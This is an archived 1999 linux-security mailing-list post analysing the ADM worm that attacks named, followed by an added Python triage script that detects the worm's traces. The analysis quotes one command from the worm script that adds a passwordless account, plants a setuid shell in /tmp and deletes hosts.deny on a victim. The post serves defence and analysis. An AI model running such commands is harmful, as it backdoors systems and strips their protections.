[2136] in linux-security and linux-alert archive
[linux-security] Re: [Security - intern] *ALERT*: ADM Worm. Worm
daemon@ATHENA.MIT.EDU (Sergio Ballestrero)
Fri Mar 26 10:34:27 1999
Date: Fri, 26 Mar 1999 15:05:15 +0100 (CET)
From: Sergio Ballestrero <s.ballestrero@c-sistemi.it>
To: Jan-Philip Velders <jpv@jvelders.tn.tudelft.nl>
cc: Thomas Biege <thomas@suse.de>, linux-security@redhat.com
In-Reply-To: <Pine.LNX.4.05.9903261134140.20702-100000@jp-gp.vsi.nl>
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
On Fri, 26 Mar 1999, Jan-Philip Velders wrote:
> On Fri, 26 Mar 1999, Thomas Biege wrote:
>
> > Date: Fri, 26 Mar 1999 09:34:10 +0100 (MET)
> > From: Thomas Biege <thomas@suse.de>
> > To: Jan-Philip Velders <jpv@jvelders.tn.tudelft.nl>
> > Cc: linux-security@redhat.com
> > Subject: Re: [Security - intern] [linux-security] *ALERT*: ADM Worm. Worm for Linux x86 found in wild.
>
> > The worm just exploits old security holes, so if you keep up to date with your
> > daemons you needn't fear that worm.
>
> Eh, the guy who reported it on BugTraq said it was a RedHat 5.2 box.
> AFAIK 5.2 is fairly recent, and could only contain 'newer' holes, like the
> stuff with wu-ftpd...
>
> > Thomas
>
> Greetings,
> Jan-Philip Velders
I downloaded the worm, and I'm playing a bit with it, on two RH5.2 boxes.
As far as I understand from the logging by iplogd
(www.linuxvalley.org/~lserni) and from netstat, it only scans, and tries
to attack, named. And on my RH 5.2, with bind-8.1.2-5, it doesn't succeed.
The "network" part is made of:
  gimmeRAND    generates random IPs (apparently from the time, since it
               returns the same ones if I call it consecutively)
  incremental  generates a sequence of IPs starting from the random one
  scanco       checks for the existence of a name service on the IP
  test         tests some vulnerability in named; I haven't seen which
               one, possibly a buffer overflow
  Hnamed       the actual exploit of the named vulnerability, which does
               some kind of "remote shell"
All the damaging actions described (deleting logs, removing hosts.deny,
substituting all the index.html files, creating a passwordless account) are done
in the script "w0rm".
The "outro" log file doesn't seem to be generated by ADMw0rm; I suppose
it's something made by some other tool, run by hand by the intruder.
Also, the tgz available via ftp doesn't contain the "remotecmd"
executable that seems necessary for the spreading of the worm:
  echo "lets hack"
  ./Hnamed $VICTIM /bin/sh -c "echo >> /etc/passwd; echo \"w0rm::2666:777:ADM Inet w0rm:/:/bin/sh\" >> /etc/passwd; /bin/cp /bin/sh /tmp/.w0rm; /bin/chmod 4777 /tmp/.w0rm; /bin/rm -f /etc/hosts.deny"
  nohup ./remotecmd $VICTIM cmd 3000000 &
A signature of the attack is
Mar 26 13:56:59 pcsash named[5349]: stream_getlen([127.0.0.1].4256): Broken pipe
but it is not always seen (I haven't understood why).
Just to be clear, let me repeat:
bind-8.1.2-5, distributed with RedHat 5.2, is _NOT_ vulnerable - at least
not to the version of ADMw0rm that was available via ftp.
Regards,
Sergio
--------------------------------------------------------------------------
ballestr@fi.infn.it <- Physics Sergio Ballestrero
sergio@ctt.it <- Business V. Marini 18
S.Ballestrero@iname.com <- Personal 59100 Prato ITALY
[mod: Ti Leggett agrees: -- REW]
If I'm not mistaken this is a really old (but very hazardous) exploit of
the bind utilities. Turn off bind services, or if you need them upgrade to
the newest packages.
Ti Leggett
legget@mcs.anl.gov
tlegget@mailhost.tcs.tulane.edu
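Added example (not part of the original post, and not code from ADMw0rm): a small
host-triage script that looks for the four traces Sergio's analysis attributes to
the w0rm script and the named exploit: the passwordless "w0rm" entry appended to
/etc/passwd, the mode-4777 copy of /bin/sh left in /tmp, the deleted
/etc/hosts.deny, and the "stream_getlen(...): Broken pipe" line from named. The
sample /etc/passwd and syslog excerpts are constructed for the example; the
regex assumes the log line has exactly the shape of the one quoted above, and
the /tmp check only flags setuid regular files one level deep, which is enough
for /tmp/.w0rm but is an assumption about where the copy lands.

```python
import os
import re
import shutil
import stat
import tempfile

# Constructed sample /etc/passwd after the w0rm script has run: note the blank
# line the script echoes first, then an account with an EMPTY password field,
# uid 2666, gid 777 and /bin/sh as its shell.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "named:x:25:25:Named:/var/named:/bin/false\n"
    "\n"
    "w0rm::2666:777:ADM Inet w0rm:/:/bin/sh\n"
)

# Constructed syslog excerpt: the named signature line from the post plus noise.
SAMPLE_SYSLOG = (
    "Mar 26 13:55:10 pcsash named[5349]: starting.\n"
    "Mar 26 13:56:59 pcsash named[5349]: stream_getlen([127.0.0.1].4256): Broken pipe\n"
    "Mar 26 13:57:02 pcsash in.telnetd[601]: connect from 10.0.0.5\n"
)

# Assumed log shape, taken from the single line quoted in the post.
NAMED_SIG = re.compile(
    r"named\[(?P<pid>\d+)\]: stream_getlen\(\[(?P<ip>[\d.]+)\]\.(?P<port>\d+)\): Broken pipe"
)


def passwordless_accounts(passwd_text):
    """Return (user, uid, shell) for every well-formed entry whose password field is empty."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank or malformed line, not a login entry
        user, pw, uid, _gid, _gecos, _home, shell = fields
        if pw == "":
            hits.append((user, int(uid), shell))
    return hits


def named_signature_hits(syslog_text):
    """Return (pid, peer_ip, peer_port) for each syslog line matching the named signature."""
    hits = []
    for line in syslog_text.splitlines():
        m = NAMED_SIG.search(line)
        if m:
            hits.append((int(m.group("pid")), m.group("ip"), int(m.group("port"))))
    return hits


def setuid_files(directory):
    """Sorted paths of regular files directly under directory with the setuid bit set.
    Dotfiles are included on purpose: the worm's copy is /tmp/.w0rm."""
    found = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        try:
            st = os.lstat(path)  # lstat: never follow a symlink planted in /tmp
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
            found.append(path)
    return sorted(found)


def hosts_deny_present(path="/etc/hosts.deny"):
    """False when the file the w0rm script removes is missing."""
    return os.path.exists(path)


def triage(passwd_text, syslog_text, tmp_dir, hosts_deny_path):
    """Collect all four indicators into one report."""
    return {
        "passwordless_accounts": passwordless_accounts(passwd_text),
        "named_signature": named_signature_hits(syslog_text),
        "setuid_in_tmp": setuid_files(tmp_dir),
        "hosts_deny_present": hosts_deny_present(hosts_deny_path),
    }


def demo():
    """Run the checks on the constructed samples and a scratch dir seeded with a
    fake /tmp/.w0rm (a stand-in for the copied /bin/sh, chmod 4777) and no hosts.deny."""
    scratch = tempfile.mkdtemp()
    try:
        w0rm = os.path.join(scratch, ".w0rm")
        with open(w0rm, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(w0rm, 0o4777)
        return triage(SAMPLE_PASSWD, SAMPLE_SYSLOG, scratch,
                      os.path.join(scratch, "hosts.deny"))  # deliberately absent
    finally:
        shutil.rmtree(scratch)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a real box you would feed it the contents of /etc/passwd and /var/log/messages and point the directory check at /tmp; the passwd and setuid checks are generic enough to catch variants that change the account name or the file name, while the named regex only catches the exact log line Sergio observed, and he notes it is not always present, so a clean syslog alone proves nothing.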
--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------
To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null